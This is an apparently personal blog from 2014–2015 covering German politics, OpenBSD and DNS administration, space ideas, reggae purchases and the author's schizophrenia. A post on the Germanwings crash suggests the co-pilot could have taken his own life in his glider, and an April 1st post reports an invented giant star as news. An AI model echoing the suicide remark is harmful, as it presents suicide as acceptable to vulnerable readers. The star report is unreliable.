when the Bear goes home, it'll be filled with data on the encounter. Valuable
data. Which the military complex there can pounce on and devour.
Just makes sense doesn't it?
Speak German at home...
December 8th, 2014
The BBC reports
that the Bavarian government insists that migrant families speak German at
home. I have a few opinions about that:
One, noone gives a hoot what you do in the privacy of your home. If they
do they oughta really check themselves before they wreck themselves.
Noone can understand south Bavarian dialekts either.
And thirdly, if my parents, when we lived in Canada had chosen to allow
us to continue speaking English, instead of German at home, then I would have
completely lost the German language. I mean completely. Just a few years
ago when I worked at the Bavarian Red Cross, one of the reasons they fired me
was because of my poor German. Yet it wasn't even that bad. Had I not known
any German then things would have been even more difficult. Language barriers
only make a migrants life a lot harder in the long run when they return to
where they came from. Don't take that away from them is my opinion, German
is not a world business language, meaning it accounts to absolutely zero in
some far off country.
Until the Bavarian government realises this I wish on them to become a
migrant for 5 years. Then we'll see how different they see the world.
Farewell American Forces
December 9th, 2014
When my family first moved to Schweinfurt there were two major things here:
Industry and the US Army. It must have been 1979 when we came here and the
cold war was in full swing. I remember a battalion of tanks riding past me
at the Obertor (Upper gate) and it left me a bit crazy, as I, a boy at the
time was a huge contrast to these huge machines manned with waving soldiers.
Another time I remember being on a class trip and we walked past a tank but
didn't spot it because it was camouflaged so well with camouflage netting.
Another time a Jeep around 1985 sat in front of my house at 9:30PM with its
radio turned up loud. It was a sort of manouver they were doing where they
practiced "Urban" warfare I guess. My dad spoiled it for them as he told
them to leave because I was trying to sleep. So now it's 30 years later
since these encounters, the cold war is long gone and peaceful times
saturated this city. It's been a few months ago now since I guess the last
american soldier left. The US has left behind 2 major barracks, Ledward and
Conn. Since Conn had its own water infrastructure and its own sewage treatment
they are trying now to connect it to the rest of the city. In the new year
we expect refugees from around the world.. (asylum seekers) to fill the
Conn barracks. At least it has a purpose still if they manage to connect it
all. So long America, Schweinfurt may miss you at times. However you leave
behind some children who have a US citizenship so I'm sure you'll hear from
us once in a while as many of these children grow up and set foot on american
soil and will have stories to tell.
Comparison between Mordor and the US
December 12th, 2014
Traits
Mordor
US
Tortures
yes
yes
Has spies all over the planet
yes
yes
Collects spy data on everyone
no
yes
Has tough border and customs control
yes
yes
Has elite military units
yes
yes
Has several allies
yes
yes
Has death penalty
yes
yes
Puts emphasis on towers
yes
yes
I could go on but the point is made, except for a sole ruler, which the US
doesn't have.
December solstice in less than a week!
December 15th, 2014
On the 21st of December we have the december solstice. That's when short
days will turn around and lengthen until June. Also on that day is the
official start of winter (I know some people don't grasp that, they see
snow they think it's winter). Winter will last until the equinox in March.
A domain expired, amdeutschhof.de
December 16th, 2014
When I knew I'd be getting this apartment I registered this domain called
amdeutschhof.de. It's hard to believe it's 2 years later. Here is an
image found on the site that I set up for it:
The domain didn't get many hits and it wasn't popular I don't think. However
the sign was taken down after it was vandalized some time ago. I got a good
picture of how it once looked. Yes, somewhere on that map is where I live.
My thought about Pegida
December 16th, 2014
I think the people around Pegida are wrong. However, one had a valid
demand. He said to get rid of the GEZ which is tax that everyone
has to pay on top of taxes, to finance the state run media (mainly ARD, ZDF,
DW and such medias). I too would like this tax gone. It's too likely that
state run media is used for propaganda. Especially in these times.
Another person said that there is no money for public installations
but money for asylum seekers (refugees). To that person I
would say, "Look in your heart, do you really want someone to continue to
live the misery that they do? When all you have to do is tolerate them as
neighbours. It would make a big difference to all."
Another said "everywhere where there is war, germany is involved, this has to
stop". Sorry, you can't stick your head in the sand and ignore
the grim picture of the world around us. We have to act against aggressors
despite how ever twisted war is. We've had 70 years of peace after making a
real mess of the world 70 years ago. Why should we not help those that need
help? And let's be frank, 70 years of peace has created people who are
"products of the environment" which is hazardous in some cases.
So I agree with one, disagree with two others. Pegida doesn't care for anyone
but their own self-served interests. I liken them to the minutemen in the
US.
NASA wants to go to Venus
December 17th, 2014
Remember the Venus Glider? One of my ideas? Search for it in this blog.
Anyhow NASA wants to go to Venus with a manned mission and study the atmosphere
at 50 km high. Life is bareable there we predict. Only they want to do it
with a blimp instead of a glider.
The above picture is from my office (it's a poster) showing venus on the left
and earth on the right. This is all the media I can give you. Let your
imagination do the rest. Also for a small hint..trees breathe carbon dioxide
which Venus has plenty. A floating base on Venus could perhaps have a few
trees for rare treats. Venusian cherries anyone?
Merry Christmas / Frohe Weihnachten!
December 24th, 2014
Tonight is Christmas Eve. Merry Christmas! It looks like it'll be a green
christmas here in Germany, as long as it doesn't rain, it'll be alright.
Winter Flowers
December 28th, 2014
Added supercluster to nameservers
December 29th, 2014
On August 12th, 2014 I removed moon.virgostar.net from the nameservers. Since
then I had been running off only two nameservers. Both were spread far apart
in Panama and Germany. Since today I have added a third nameservers again,
this time it's called supercluster.virgostar.net. While doing so I noticed
(thanks to DENIC) that my delphinusdnsd and its predecessor wildcarddnsd
version 0.9.0 mismatched/flipped the refresh and retry values in the SOA of a
zone. I fixed that and put it back in production. Supercluster is running
nsd in a slave mode. Earlier before doing the DNS change I upgraded
supercluster to OpenBSD 5.6 and applied all known patches. It's been a busy
morning and I'm fairly tired. So looking at the winter flowers will get me
going again, I hope.
Happy New Year!
December 31st, 2014
It's New Years eve here in .de, but on the globe the date is already
January 1st (in .au for example). May 2015 be a prosperous year for you and
me. Signing off for 2014, yours Peter J. Philipp.
Donation time again
January 5th, 2015
I have written a bank transfer to OpenBSD for 50 euros, labelled it
"1st quarter", so it may be that OpenBSD is getting similar amounts
three more times this year. Told you it'd be less than last year.
My 150 Euro Calculator
January 5th, 2015
You know I own a Raspberry Pi. Well in December of 2014 I bought an Adafruit
TFT with touchscreen (only with a pen) that is 2.7". Here is the costs
involved:
Raspberry Pi - 70 euros with SD card and Powersupply.
Adafruit TFT display and Case - 50 euros.
Shipping and Customs from NYC, USA - ~30 euros.
I installed xdm and modified it to run calculator (xcalc) over the entire
screen. It has a screensaver too. This is what it looks like:
I put an OpenBSD sticker on it but only to cover the holes for the buttons
which I need to buy the buttons for but not likely since customs costs so
much. This rpi is running raspbian OS. One day I'm going to overhaul this
calculator but for now it's working nicely.
Ordered 3 books
January 9th, 2015
I have ordered a book titled "The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory". This is something that interests
me and that I'm a total newbie in. With this purchase was a recommendation to
buy 3 books so I got the Red Team Field Manual along with Practical Reverse
Engineering. I wonder if it was a good decision. Since my budget for this
year is only 6-8 books I'm only going to count this as 2 books instead of 3.
I am not your subordinate
January 11th, 2015
The longer I observe the International news in regards to views from other
countries with their relationship to Germany, I just want to make it clear.
I'm not your subordinate. Other countries waged war versus Germany 70 years
ago and we lost. However we're not born to be subordinates generations after
the war, so treat us as sovereigns. If you do not you lose a friend. And
friends is what everyone needs in these times. I sense that it makes Russians
furious that Germans are able to share their opinions on the world wide web or
even the Internet. I sense that Americans feel they have to protect a secret
when it comes to exchanging valid information. I'm not your little friend and
I'm not your big enemy. I am sovereign and seek freedom with something else.
I'm annoyed that Mr. Gorbatchov is blaming Germany for the problems his country
has with Ukraine. But my stance is, let the Ukrainians decide their own fate.
All the power-struggles of Russia are immature and pertrude insecurity world
wide. Get real!
And our rights diminish...
January 13th, 2015
I'm unsure whether it should be "thanks charlie" or "merci charlie". As
there is now tougher laws, tougher controls and tougher everything-that-takes-my-freedoms. Even in England they are considering outlawing strong crypto. I
guess we may as well start paying a tax to organized crime immediately since
they can just read through the crypto that's weakened. Good thought! How
free and creative!
Purchased some Reggae
January 15th, 2015
In order to chill out and have something new to listen to I purchased some
Reggae. The lucky artist I picked this time is Khago - The Real One (album).
These 10 songs join my collection of reggae now.
This is how fair the world is
January 19th, 2015
1% > %99. After the
collapse of nations which is looming I predict people will want to do something
different, if we still have a chance.
Is it more than Space Junk?
January 24th, 2015
I read somewhere that companies want to put their own satellites into space
to connect the remaining 40% of Internet-illiterates. Google, SpaceX and
Virgin Galactic I think. They dream of satellite formations that envelope
the world and are able to give Internet in far remote corners where laying
fibreoptic cabling is too expensive. I personally would tell these companies
to "stand back" and hold that thought. If everyone does their own
"Iridium constellation" then we'll have a major problem with space junk. What we need
is 1 platform for everyone to keep it sane. So I hope these companies will
"network" in the form of humans talking together and planning together instead
of competeing and making a mess of the space that surrounds us.
I would bet
that if we put reflectors or laser optic communication devices on the moon that
people would control and talk to from earth that the problem would solve itself. The moon is seen by pretty everybody on earth but not always. So you can set
up a communications link to give people a "downtime" to think, dream, plan and
improve their methods of communicating with the moon and each other. In my
view this is much more reliable and constructive than leaving space junk in
orbit around earth. I've noticed that I think different when I'm online. I
compulse more, I don't use my imagination as great as I do when I've spent
time away from the net. Some examples are a long train journey (clickety
clackety) or even being in the closed ward of a psychiatric institution.
In
the end perhaps I wanted to put a thought out there when I had
moon.virgostar.net on a Hong Kong VPS. In my view it's all about the moon,
not earth orbit.
Administrivia
January 24th, 2015
I just noticed the dates were wrong for January's articles. I forgot to
increment the year from 2014 to 2015 in my template script that I use to
write the articles with. It should be fixed now. Sorry.
Cryptowars: Organised Crime and Terrorists
January 26th, 2015
I have had this on my mind for a long time now. Terrorists cause laws to be
put in place to weaken crypto, or attempted laws. This falls into the hands
of Organized Crime who control corporations who provide Internet. At the
point when innocents join a provider that is corrupt their crypto can be
read and placed on the Organized Crime black market. Now, the problem with
this is who is a greater enemy to government? Organized Crime or Terrorists?
Please don't tell me OC doesn't exist. AFAIK in Canada there have been
identified six groups of Organized Crime and many are multinational meaning
that Germany too has at least some of these groups.
Let's look at Organised Crime further, if these people were in power we'd
have:
Disappearances (people being eradicated from life)
Shadow Governments (think of a place where OC runs a region)
Elitism (only those with an edge on technology reign)
Stronger crime syndicates (more money will remain in the underground economy)
Less taxes, less common taxpayers money
Bribes on government would pick pick up
If that doesn't scare the bejeezus out of you but terrorists do, then you should
reevaluate life on this world. This is why I'm for strong crypto that, yes,
even our government can't break. Perhaps we should prepare ourselves mentally
to allow terrorist attacks and work politically to prevent them instead of
judicially. I know OC is a bigger beast than terrorism and if we don't get it
in check it will cost us a lot more than terrorism ever will.
Electricity (day) consumption up (unfortunately)
January 27th, 2015
I got my electricity bill today. Something really weird is going on because
I spent less electricity for heating (night electricity which charges up my
electric furnaces) but more for day electricity. In a little HTML table it
would look like this:
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
It could be one of two new computers, one of which is only on at days. It
could be freifunk usage only during the days but not at nights, and it could
be that I use my network which is doubly encrypted only during the days mostly.
I'll be curious what 2015 will be like. It will likely go a little higher too.
Purchased some Reggae
January 28th, 2015
I have the winter blues. I decided it's worth it to spend another 8 euros
for reggae. I have purchased Delly Ranx's The Next Chapter. I'll be busy
listening now.
The rich can't buy smarts, can they?
January 28th, 2015
I think they can. Artificial Intelligence, once it's on the market the
rich will be not just rich but also super smart. Because they can put
full trust into AI, to make them richer. So the monopoly that peasants
have over them on the Internet... well the days are numbered for that.
Just my thoughts.
I want a Greek bailout
February 2nd, 2015
While I don't think it's fair that greeks mismanaged their money, I feel they
are Europeans like us and we should help them. It's a known fact that the
south of the EU cannot produce economically like the north. So for european
unity I believe a solidarity tax with the southern countries would be a proper
thing. We want to be on a flat and even playing field in all of Europe but
industry in the north is way beyond the infrastructure that the south has.
Everyone would pay into this tax, all europeans, but it goes back to the south.
So in effect it means the north is working for the south, yes. But that's the
price of unity we have to pay, perhaps the south can repay us in other ways.
Why I think "The Time Machine" doesn't work in reality
February 3rd, 2015
If you've seen the movie "The Time Machine" you may recall how he sat on a
chair and the timemachine moved through time linearly. This would work if
the earth was the center of the universe and didn't move in space and time.
However our earth follows the "solar apex" which means it's pulled along the
sun at some speeds in the direction of the star Vega. Also we rotate around
the sun also called orbiting. We complete one orbit in 365 days and a few
hours. So if you were to go forward in time but not in space then we would
miss the earth if you really think about it. Same with going backwards in
time. So when building a time machine make sure you send astronauts out first
with preferably a spaceship so they can come back to earth.
The last frontier, under the ice
February 5th, 2015
An old but new idea caught me last night. You probably heard of
NEEMO which is NASA's
underwater research station. Well consider NEEMO with a twist. It
would be installed under the ice at the north pole of the planet earth.
To do this I envisage a purely civilian project that uses old submarines
converted with
AIP fuel-cell
propulsion. If you follow that AIP link it shows that this type of submarine
can do 3000 nautical miles at 4 knots. Which is enough range to have a
submarine go from Svalbard, Norway under the ice to the north pole and come
back. The range between those two points is somewhere between 600 and 800
nautical miles (I haven't really done the math). The idea is to have a
research outpost under the ice at the north pole and use nuclear fusion or
just plain fuel-cells to produce electricity. Oxygen to breathe would be
imported with supply submarines. Communications can be done with long wave
radio as is common with submarines but the antenna is gonna be huge. There
already is a research station over the ice at the south pole, this would
complement its science but under the ice.
Thinking of voting Die Linke in 2017
February 5th, 2015
I've never voted that far left in my life. But the facts are the facts:
Rich are richer, poor are poorer, distribution is out of wack
Socialist parties like the SPD who are supposed to be center-left, aren't
Leftist parties like the Greens did not do enough when they were in power to stop the global inequity
Greece voted left so why can't I?
Perhaps there will be more money for me when I vote Die Linke so that I can pay into a pension fund
Right now I face no future, with no or little pension, I'll be poor when I retire
This is the grim reality. I've considered other parties and my past voting
was Greens, Pirate Party and now Die Linke. Everything is not normal today,
people are suffering and we need real change. For fairness.
Next Week marks Two Years in My Apartment
February 6th, 2015
Almost 2 years ago I
moved
in this place. Haven't regretted it yet, it's a wonderful place.
I'm sick
February 13th, 2015
These are the sickly days of winter. I came down with acute bronchitis since
last weekend. I'm now on anti-biotics and medicine that will hopefully help
me develop the mucus and phlegm required to cough out this virus. Sorry for
the graphic picture. I haven't been sick in a long time like this.
Upper Lower Class
February 14th, 2015
This impressed me very much. At wikipedia under the American upper class
article there is this chart of classes. Now while I live in Germany
and I always felt like I was in the middle class, I work in North America and
get paid in dollars. I also have a North American education of "some college".
Many of our customers are US based, and I'm thinking where my place would be.
Yes I'm in the Upper Lower Class. Lately this realisation has enthralled me.
And it's made me a bit angry too. Dear world, I'm not OK with where you're
going.
Moved the blog
February 16th, 2015
I have moved the blog away from my old vps's. This means it's a single
point of failure too as only one server (in amsterdam) is hosting the
blog. This opens new avenues for me to eventually give up the Panama
vps. The destinations americas.centroid.eu and emea.centroid.eu still go
to the old vps's but I'm going to location tag them over soon.
The host it's now run on is powered by OpenBSD and is running openbsd's
httpd, as you can see it's fairly successful at it. Please update your
RSS if you were using it, as it may not work as before (you need to determine
this).
Purchased more Reggae
February 17th, 2015
I don't just buy men artists, although the majority of Reggae I have is men.
This album I just bought is from a woman. Etana - "I Rise". Looking forward
to hearing the entire album.
Scarcity vs. Abundance
February 21st, 2015
Scarcity, what is it? It means that something (resources) are limited to an
extend that they are scarce or little. What is Abundance? Abundance is the
exact opposite. I remember the first time I heard the word abundance it was
in a Bob Marley song and it went "In the abundance of water, the fool is
thirsty". I heard the word scarcity after hearing use of abundance really.
On earth we live a life of scarcity when it comes to "things". We may have a
toaster and a tv, but we do not own a rocket or space shuttle to take us into
orbit. Only a few people that are selected can go, "on behalf" of humanity.
I'd like to contrast scarcity with abundance in computer systems.
My first computer I had (a ZX-81) had 4KB of RAM, it was really scarce.
Compare that with my newest computer that has 32 GB of RAM, that's a factor
of 8 million times what I had back then. I just hope that we don't get too
disappointed that we don't see such factors of abundance in material things
such as space shuttles.
I lived in North America for 15 years and in the
early years I noticed a contrast that a lot more people had an air conditioning
system with their house or apartment. In Germany there isn't as many systems
but it has to do with scarcity of electric energy. It makes no sense to
run a coal powerplant to run an air conditioner, my dad always said. The
burned coal produces carbon dioxide which in turn causes the greenhouse effect
aka global warming. If using green technologies such as wind turbines we're
tapping into an abundance of energy on earth. Yet wind turbines aren't cheap
and there is a scarcity of them.
In fact we're in energy transitioning times
where we're going from unsustainable and falsely seemingly abundance of energy
in form of nuclear to sustainable wind and solar. What nuclear energy has
left us with is an abundance of poison in form of nuclear waste. 1 mg of it
could kill thousands of people. So I'm gonna stop here on that topic.
As you can see we're living in mostly scarce times, except the computers...
those buggers seem to double capacity every 18 months. But I can tell you
we're hitting a limit even with computers. Right now we're having a heyday
going smaller and smaller with chip circuitry, but we're nearing an end. I
think they say 8 nanometers is the end of it. We're at 22 now I believe.
We'll have to look for new ways of computing in order to keep up this seemingly
abundance of capacity.
Oh well, that's all I wanted to say, although I'll continue when more comes
to mind.
Ordered three books
February 23rd, 2015
I have ordered three books that generally interest me.
It's about Time: Understanding Einstein's Relativity - Mermin, N. David
Quantum Computer Science: An Introduction - Mermin, N. David
Other than being about Quantum computers they don't really deal with computers
much.
Nearing 20 years UNIX experience
February 24th, 2015
In 1995 I first installed GNU/Linux on my sole computer (a 486/66). A year
later it ran FreeBSD 2.1-RELEASE, another year later in 1997 I got my first
sysadmin job (starting pay $10/hour, soon after $36K a year). All in all
I'm nearing 20 years experience as a UNIX user and 18 years experience as a
UNIX sysadmin. It should really be UNIX-like although we did use Solaris in
1997 and BSD is not a clone. A lot has changed in those 20 years. For one
I don't have the body I had back then. Back then I was slender and carried
a Basketball. Now I carry the basketball in my stomach, lol :-). But I'm
also wiser, I admit. And I'm getting smarter, I recently worked out how much
raise I should be getting after inflation from what my salary was in 2000.
If I had any advise to young people is: "don't underestimate how much you're
worth, make them pay" and "stay physically fit despite those long hours they
want you to put in". Whether I'll be doing this another 20 years? Time will
tell.
Got a washing machine
February 25th, 2015
Two years after moving into this apartment, I've finally got a washing machine.
Picture here:
I used to take my laundry to my parents house but it's too much work now that
my mother is home after having a stroke (she was in hospital for a few months),
so I got this thing.
OpenBSD donations reached 397,000 dollars in 2014
February 26th, 2015
Ken Westerback of the OpenBSD Foundation has said this about 2014:
We received $397,000 in new donations and paid out $129,000 to support the
activities of the OpenBSD and related projects.
And this year in 2015 they plan to raise $200,000. If you haven't donated
yet please consider a small amount
here or look up how to do donations otherwise.
I personally don't know if my money made it to the OpenBSD Foundation because
I donate directly to Theo de Raadt's Munich bank account. So that money may
be higher than $397,000. This year I decided to donate 50 euros quarterly and
the first quarter is not up yet. But in a month it will be, I'll let you
know when I do the second donation of the year.
God Speed Spock!
February 27th, 2015
## ##
## ##
## ##
## ##
## ##
###
#
RIP Leonard Nimoy, 83.
Softraid Crypto seems secure
March 5th, 2015
Sometimes I do pesky things such as asking OpenBSD developers if their
stuff is secure or not (or if they wrote certain parts). I do this in
part out of curiousity and lazyness at the same time. And so it came
that I asked OpenBSD developers the following questions:
Why is there duplicate blocks in a crypto softraid disk image?
If it's because ECB mode is used would a counter mode be better?
Now Ted Unangst answered with some helpful answers. He understands code much
better than I and his answers seemed very helpful.
Another developer Joel Sing answered but his answers didn't hit my satisfaction
factor as much. In fact Joel wanted to make me work and overcome my lazyness
factor and he asked the following questions:
What encryption algorithm/mode is used for disk block encryption?
Where do the keys come from that are used for the disk block encryption/
decryption
How are the keys that are used to encrypt the disk blocks stored?
When creating a new softraid crypto volume, Where does the key come from?
What happens if you use a keydisk instead of a passphrase?
Now Joel knew that I had picked the function sr_crypto_encrypt() next to
randomly because it was the closest looking function to having a crypto
component. I guess I must have picked the wrong function. If ECB is not used
for question #1 then perhaps it's AES XTS which is also mentioned in the code.
I know very little about this mode and found only a little wikipedia entry on
it.
I'd like to rant about this a little more but I need to do more research.
Spending 30 minutes reading /usr/src/sys/dev/softraid* and /usr/src/sbin/bioctl
is not enough to make a concrete picture of this. And this isn't easy code
either. I have much respect for Marco Peereboom and Joel Sing and others who
wrote this for their perseverence in understanding such a complex thing. I'm
just not at their level and likely never will be. Whether I was even helpful
for anyone is debateable. But then again if noone looks and asks questions
even if seemingly ignorant who is? I for one want OpenBSD tested and questioned in order to find what works best. If it didn't have that I wouldn't use it
and I'd feel a lot more insecure. I'll give you another example, when W^X came
out I was not satisfied with just them telling me that stack overflows are now
protected. I wrote my own test programs to really test this to the extend of
knowledge that I had on stack smashing. Had I not done this I would never
have guessed that a program exits on SIGABRT when W^X detects a smashed stack.
OpenBSD's httpd with webalizer
March 5th, 2015
I like using webalizer to give me an idea how much international traffic I
get with the GeoIP extension. Well when I switched to openbsd's httpd
something was broken. It took me a few weeks to find time today and I figured
out that the combined logfile prepends a %v (in apache speak) which is a
virtual hostname. I wrote a script to remove this (apache recommends a program
called split-logfile):
$ more webalizer.sh
#!/bin/sh
TMPFILE=`mktemp /tmp/blah.XXXXXX`
awk '{$1="" ; print ; }' /var/www/logs/access.log | sed -e 's/^[ ]*//g' > $TMPFILE
cd somelocation && webalizer -w $TMPFILE
rm -f $TMPFILE
Granted the USA and China are usually 1st and second place because of their
aggressive search bots googlebot and baidu. How many people found this blog
through a search engine? I hate to tell you your search engine is breaking
the rules because I am maintaining a /robots.txt file which should exclude
bots from going into my blog. I am not mad about you being here though just
mad for being indexed.
Oldlaptop's github repo
March 5th, 2015
I had the opportunity to talk a little to oldlaptop on efnet. We talked a
little about popcon.debian.org and
noticed that openssh-client had >170K users at debian, and sed being the
most popular package. Oldlaptop has a github page where he designs software
and packages for UQM (/usr/games/uqm in OpenBSD). His github page is
here. Thanks for chatting
oldlaptop!
Purchased Reggae
March 7th, 2015
This month I got Luciano - Special Edition (2014).
Crackers are getting more careful
March 7th, 2015
Captured from an IRC session:
13:13 <@pbug> # grep 182.100.67 authlog | wc -l
13:13 <@pbug> 543
13:13 <@pbug> # grep 182.100.67.112 authlog | wc -l
13:13 <@pbug> 44
13:13 <@pbug> these pesky things!
13:14 <@pbug> they change their IP and continue trying to log in as root
13:15 <@pbug> oh what's more they are careful not to overload my pf tables now
13:15 <@pbug> # pfctl -t bad_hosts -T show | grep 182.100.67
13:15 <@pbug> #
Good thing I disabled root logins they have been trying to crack it a long
time now while evading my overload pf tables.
Equinox in 8 days
March 12th, 2015
The March Equinox is upon us again. If you're in Europe you're getting a
rare treat at around 8:46 CET. We'll have a solar eclipse then, in parts
of Germany the Sun will be covered around 70-80%. Some people are worried
about solar power degrading and causing blackouts, we'll see. Only in the
Faroes and Svalbard will there be a total solar eclipse, btw. So make plans
to travel there now! LOL just kidding!
Wrote two members of parliament
March 12th, 2015
I have written two members of parliament representing Schweinfurt regarding
the Stoererhaftung. I was prompted to write them according to this
article, a call for help.
I currently run the only known Schweinfurt nodes of Freifunk Franken, so this really does affect me not just
indirectly.
Pre-Ordered OpenBSD 5.7
March 13th, 2015
Pre-orders are on. If you want to order OpenBSD 5.7 too and don't know how
go to openbsdstore.com and click the
flag at the top right to specify your region. The prices will then update
and you'll be able to see 5.7 at the very top and proceed to buy it. Have
fun!
Happy Pi day
March 14th, 2015
It's 3.14.15 as written in american (english too?) dates. This year the year
also represents digits of Pi, so this year is special.
My Eclipse photos were a FAIL
March 21st, 2015
I made a construct with my ipod and welders glass to capture the eclipse.
Unfortunately the images came out pretty bad. There is no lessons learned other than that it
doesn't work this way. One suggestion was that I had to turn auto exposure off
but I'm unsure of the setting on my ipod. Where others chose routes of
perfection, I chose routes of failure it seems. Over and over again.
Purchases more Reggae
March 24th, 2015
In order to get by this march I have bought a rather old riddim (from 2013)
called the "contagious riddim" which is various artists on the same track.
I wouldn't know about this if it wasn't for pre-viewing on youtube, so props
goes to youtube too.
The catch-22 of mental illness
March 28th, 2015
Everyone heard of the Germanwings Flight 4U 9525 by now. The co-pilot
caused a murder-suicide by crashing the plane deliberately. The evidence
gathered amounts that he was mentally ill, but it wasn't depression. So
did he hear voices? Ie. did he have schizophrenia? This is just a guess
right now until the media reports the truth around his mental illness.
So is it right to give up your job that you love because you have a mental
illness? Is it right to hide it from your employer?
I have schizophrenia
myself, but my employer knows this, but what if he didn't? Would that change
a thing? In my view Andreas L. was reckless. He was a bull gone mad. He
should have told his employer and take the hit. It would have saved 149
innocents from dying. Truth is he would have lost his job, but there is
other not-so-glamirous jobs that he could have taken on. And if he still
wanted to kill himself he could have done it in a way that affects only
himself. Like perhaps doing it in the glider he was solo'ing often.
More facts will appear in time, however, I'd also like to say this: "That
guy made us mentally ill look bad, and is causing unneeded consequences on us!".
We too are victims of this madman.
Please, not another LEO ISS!
March 29th, 2015
Russia's space agency and
NASA may collaborate to create another ISS after the current ISS will be
scuttled in 2024. Now if they want to do another LEO (Low Earth Orbit) ISS
then I gotta yawn and say "boring!". How about raising the bar a little and
putting a station around the moon? I'd even be satisfied with a station at
Geosynchronous Earth Orbit (GEO). If Europe is expected to collaborate on
another ISS I want them to consider this! Also the news of space junk and
the evasive manouvers that the current ISS had to do makes it literally
dangerous to put another ISS in LEO.
R.I.P. Paul Schenkeveld
March 30th, 2015
News hit me
that Paul Schenkeveld has passed away. This is sad news indeed. I ate at the
same table as Paul at EuroBSDCon 2011 and noticed he was a great person. Later
I watched some of his Youtube contributions regarding bhyve the BSD hypervisor.
Also I enjoyed his interview of Will Backman at BSDCan (forgot year). Even
though we hardly knew each other Paul, you will be missed. And I thank you
for the help that you provided in all sorts of mediums. Rest in Peace.
ESA what are your plans?
March 31st, 2015
All space projects big and small required planning. And so it is that I am
sitting here looking for the plans of ESA for future manned space flight.
Why is it that I can't find anything? We know the ISS goes on to 2024, after
which the Russians will decouple their part and create a new space station.
America has plans to capture a boulder from an asteroid and make it a part
of the moon. Also the americans are working on a Mars mission. What is
Europe doing?
When 2024 comes around are we going to hitch rides on the
russian space station? Or are we going to hitch rides with Americans? Or
both? Why not make our own thing? The ISS didn't occur in 1998 without a
plan. In fact if you research space station Freedom you'll see it's about as
old as the Space Shuttle itself. Mir also existed but it was pressured to be
given up in place for the ISS. Even project Apollo that put the first men on
the moon required at least a decade planning. So we have 2015 now.. 2024 is
in nine years. For me those nine years will likely go pretty quickly. Can
ESA let us know their plans beyond 2024?
Astronomers detect giant star in Constellation Pisces
April 1st, 2015
A giant star was sighted by the Sternwarte Schweinfurt. They are
unsure where it came from but it suddenly appeared, seen through the main
refractor scope at the Sternwarte. For hobby enthusiasts who want to see this
new giant star one should direct their scope at these coordinates:
Right Ascension: 0:40:0.0 Declination 4:16:0.0. As this star has a giant
red-shift (good opportunity to see this is at evening time) the coordinates
could change, it is said.
Happy Easter
April 4th, 2015
I had a quiet but good easter friday, hope you did too.
Greece's war reparation demand
April 7th, 2015
Today Greece has
uncovered the war reparations cost from World War 2 to Germany at 279 billion
euros. Let's put this in perspective. The entire war reparations of World
War 1 which led to World War 2, ie. the
Treaty of
Versailles asked Germany to pay 33 billion 1921 dollars. With inflation
that would be 432.73 billion dollars today, which at todays exchange is 398.77
billion euros. So Greece's demand is over 70% of the demand by all Allies on
Germany after World War 1.
Personally as a German I'd like to pay, given the following demands:
We pay 1% per annum at 2.79 billion
We pay for 100 years at no interest
Greece enters a German-France-Greece military alliance within the EU
Somehow I think the Greeks would say yes to this. However try to convince
the _other_ germans that we should pay a cent, and they would not be willing.
And then there is always risk for world war 3 because reparation demands are
too high. History repeats itself, almost always. BTW the budget for 2013
was 302 billion euros in Germany. Do you think we can put 1% aside?
Wildcarddnsd 0.9.1
April 9th, 2015
I have just made public the 3 months old fix that fixes a mixup of SOA retry
and refresh values. I have updated the CVS and made the tarball public at
the Wildcarddnsd legacy page.
This is likely the last fix before Delphinusdnsd 1.0.0 release in November.
If you paid attention I have changed the name of the DNS server.
I have purchased another Riddim
April 10th, 2015
For April I have purchased the "Peace and Love" Riddim from various artists.
Peace and Love to Reggae music!
Mac OS X 10.10.3 killed my screensaver!
April 11th, 2015
I upgraded my Apple Yosemite from 10.10.2 to 10.10.3 last night and this
morning noticed that the sleeping monitor would not come back after I hit
keys on the keyboard. So I thought the HDMI-DVI adapter broke and exchanged
it with an HDMI cable to the monitor. Still the same behaviour though.
I found a Apple support document that recommends just entering the password
on the blank screen and the video would then come back. I'm gonna try this
now, I'll let you know how it goes. BTW my Mac is a mac mini from late 2012.
It has USB3 ports if that matters any.
Sorry no Linkedin, yet
April 11th, 2015
Someone invited me to Linkedin. Thanks! For now I wish to be independent
though. When the time comes, when I need a Linkedin profile, I'll blog
about it.
One year of mercury (computer)
April 13th, 2015
On April 22nd, 2014 I received the ordered system which was custom built at a computer shop.
The computer is mostly off at nights and weekends and when it runs it's fairly
bored. For the type of work I do I need mostly a mail client, a browser and
ssh all of which don't put so much load on this system. Yes a web browser
could in theory use up a lot of resources but the types of websites I use for
work don't do that. This year I plan on repurposing this machine possibly in
november/december, to become a bhyve hosting system. I'll need another system
replacing it though. Right now I have my sights set on a mac book or MBP that
I'll use with a docking system to become my workstation. The mac mini (gaia)
may see another repurpose as well, I'm hoping to put OpenBSD on it natively.
Not sure if I can do that yet, but the usb3 support in OpenBSD seem promising.
Blog Outtage this Morning
April 15th, 2015
There was a power related issue at the datacenter of my VPS provider in
the Netherlands. This caused centroid.eu to be unreachable for a number of
hours. Now you know :-(.
The contraction of my VPS network
April 15th, 2015
At one point in time I had three global VPS's rented. One was in Hong Kong,
the other in Panama and a third in Nuremberg, Germany. Now I have replaced
the Hong Kong VPS with an Amsterdam VPS, and I'll likely replace the Panama
VPS with a new Frankfurt VPS hosted at Digital Ocean. As long as I can use
FreeBSD there, that is. What this means is that there is a contraction
happening. I'm contracting back into Europe from a worldwide presence. I
still have to think about why I'm doing this but it's reactionary to outside
influences.
Backport of patch for OpenSMTPD 5.4.2p1
April 20th, 2015
Gilles Chehade of OpenBSD/OpenSMTPD fixed the OpenBSD 5.5 and higher version
of opensmtpd with this patch. I run FreeBSD with an old port of
opensmtpd on io.solarscale.de (one of my vps's) and I have backported this
patch to there. Thanks Gilles! Patch is here. Apply it from the smtpd directory inside the release.
Exploring Xephem
April 21th, 2015
Look at this excerpt printed to .ps and later converted to .jpg with gimp.
This came from xephem 3.7.7 RC3, a fantastic program. One thing I noticed
however that if you go forward in time the position of the Vernal Equinox
which is indicated here as "VEq" does not shift. In another program called
stellarium it does change, and the coordinates of RA/DEC change as well with
time. I don't know if this is proper that these coordinates change with time
but as a rule always provide the date when giving RA/DEC coordinates please.
Future Astronomers (in 2500 years) may appreciate that.
Vernal Equinox and Jesus
April 22th, 2015
Forgive me, I'm not really religous. I believe in a god though. When
playing with xephem I noticed that the vernal equinox happened around the
time Jesus died, in easter. And what is really interesting in this all is
